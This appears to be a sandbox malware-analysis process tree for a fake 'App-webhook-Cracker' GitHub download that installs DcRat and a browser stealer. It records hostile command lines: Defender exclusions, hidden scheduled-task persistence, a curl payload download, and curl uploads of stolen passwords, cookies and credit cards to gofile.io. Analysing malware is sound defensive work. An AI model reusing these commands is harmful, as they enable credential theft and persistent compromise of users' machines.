C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3144 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Sindoes/App-webhook-Cracker2⤵
- DcRat
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffa146646f8,0x7ffa14664708,0x7ffa146647183⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵PID:2204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:83⤵PID:208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:13⤵PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:13⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:83⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5824 /prefetch:83⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:13⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4100
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\$77XD.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\$77XD.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\$77MicrosoftData"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4100 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3404
-
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9342.tmp.bat""3⤵PID:5692
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:5924
-
-
C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe"C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe"4⤵PID:6208
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77$77svchost.exe.exe5⤵PID:6176
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77$77svchost.exe.exe" /TR "C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe \"\$77$77svchost.exe.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6488
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77$77svchost.exe.exe5⤵PID:7064
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "$77svchost.exe_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:005⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6592
-
-
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"2⤵PID:2260
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"2⤵PID:2184
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 2283⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2932
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1952 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Bridgereviewhostdhcp\QvcddhawIRZ4U7hBhZE9IYIsN.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:440 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Bridgereviewhostdhcp\DLNYcJf.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:4192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4884
-
-
C:\Bridgereviewhostdhcp\webhostdll.exe"C:\Bridgereviewhostdhcp\webhostdll.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgereviewhostdhcp\webhostdll.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\Idle.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Idle.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\OfficeClickToRun.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\sihost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\dllhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\WmiPrvSE.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\csrss.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\conhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\reports\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgereviewhostdhcp\MoUsoCoreWorker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5128
-
-
C:\Users\Admin\Downloads\Idle.exe"C:\Users\Admin\Downloads\Idle.exe"6⤵PID:6836
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e9ad25f8-001f-4406-bdb0-35e855ed9302.vbs"7⤵PID:2552
-
C:\Users\Admin\Downloads\Idle.exeC:\Users\Admin\Downloads\Idle.exe8⤵PID:4596
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02b28c63-abec-46fa-b6d9-687b5abbbb56.vbs"7⤵PID:6884
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\App-webhook-Cracker-main\WebhookCracker.bat" "2⤵PID:5076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of FindShellTrayWindow
PID:2256
-
-
C:\Windows\system32\curl.execurl --insecure https://public.bn.files.1drv.com/y4m-BcWm4Ds2apkE0tPu0hSa3n7Wql3BZeKuQkrd7Xbc2Muj9NVAO0GnMlK39nvHT6hgid1YX8tADRDIziIIogVcGDFsVL2vjKQ51m92ffSv1ZxKdnRrsT0PCjo9y77aObXEJlg1oDeNdbxaACWfuU7iB5iF-Gix_QhEYt3aDKE6Swt-ALb2Ix8hgZPZ9BmW1BKSaWCPS4f7X9661oNMSR0jw6zJ2Xfze15y2AUTr3VV1c?AVOverride=1 --output C:\Users\Admin\AppData\Local\Temp\hah.exe3⤵PID:4232
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "jusched" /tr '"C:\Users\Admin\AppData\Roaming\jusched.exe"' & exit3⤵PID:1800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:320
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "jusched" /tr '"C:\Users\Admin\AppData\Roaming\jusched.exe"'4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B84.tmp.bat""3⤵PID:3004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3960
-
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1712
-
-
C:\Users\Admin\AppData\Roaming\jusched.exe"C:\Users\Admin\AppData\Roaming\jusched.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2528
-
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"2⤵PID:1624
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:4784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:5440
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:5616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:6464
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:6628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:6868
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:6424
-
-
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\JOKER.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\JOKER.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3624
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"2⤵PID:4500
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"3⤵PID:5456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:5628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:6100
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"4⤵PID:6676
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile5⤵PID:6660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"4⤵PID:5368
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile5⤵PID:6552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"4⤵PID:6664
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile5⤵PID:6012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"4⤵PID:6116
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile5⤵PID:6260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"4⤵PID:6676
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile5⤵PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"4⤵PID:7040
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile5⤵PID:6188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGroup.emf" https://store4.gofile.io/uploadFile"4⤵PID:7016
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin/Desktop/BackupGroup.emf" https://store4.gofile.io/uploadFile5⤵PID:6616
-
-
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"2⤵PID:5768
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"3⤵PID:5384
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:6096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:6300
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:6192
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:5124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"4⤵PID:6452
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid5⤵PID:6948
-
-
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"2⤵PID:5992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\App-webhook-Cracker-main\WebhookCracker.bat" "2⤵PID:5764
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"2⤵PID:468
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Application Frame Hostㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ" /sc ONLOGON /tr "C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe" /rl HIGHEST /f3⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5676
-
-
C:\Users\Admin\AppData\Roaming\5781\Application Frame Host.exe"C:\Users\Admin\AppData\Roaming\5781\Application Frame Host.exe"3⤵PID:1944
-
-
-
C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"2⤵PID:6940
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Bridgereviewhostdhcp\QvcddhawIRZ4U7hBhZE9IYIsN.vbe"3⤵PID:5052
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Bridgereviewhostdhcp\DLNYcJf.bat" "4⤵PID:4348
-
C:\Bridgereviewhostdhcp\webhostdll.exe"C:\Bridgereviewhostdhcp\webhostdll.exe"5⤵PID:3128
-
-
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\App-webhook-Cracker-main\vault\downloads.txt2⤵PID:840
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3180
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3812
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3996
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:3500
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2800
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2104
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:232
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1684
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2392
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3880
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4420
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
PID:2644 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Migration\WTR\Idle.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\Idle.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:320
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\Idle.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4208
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Downloads\Idle.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\Idle.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2808
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Downloads\Idle.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1432
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:64
-
-
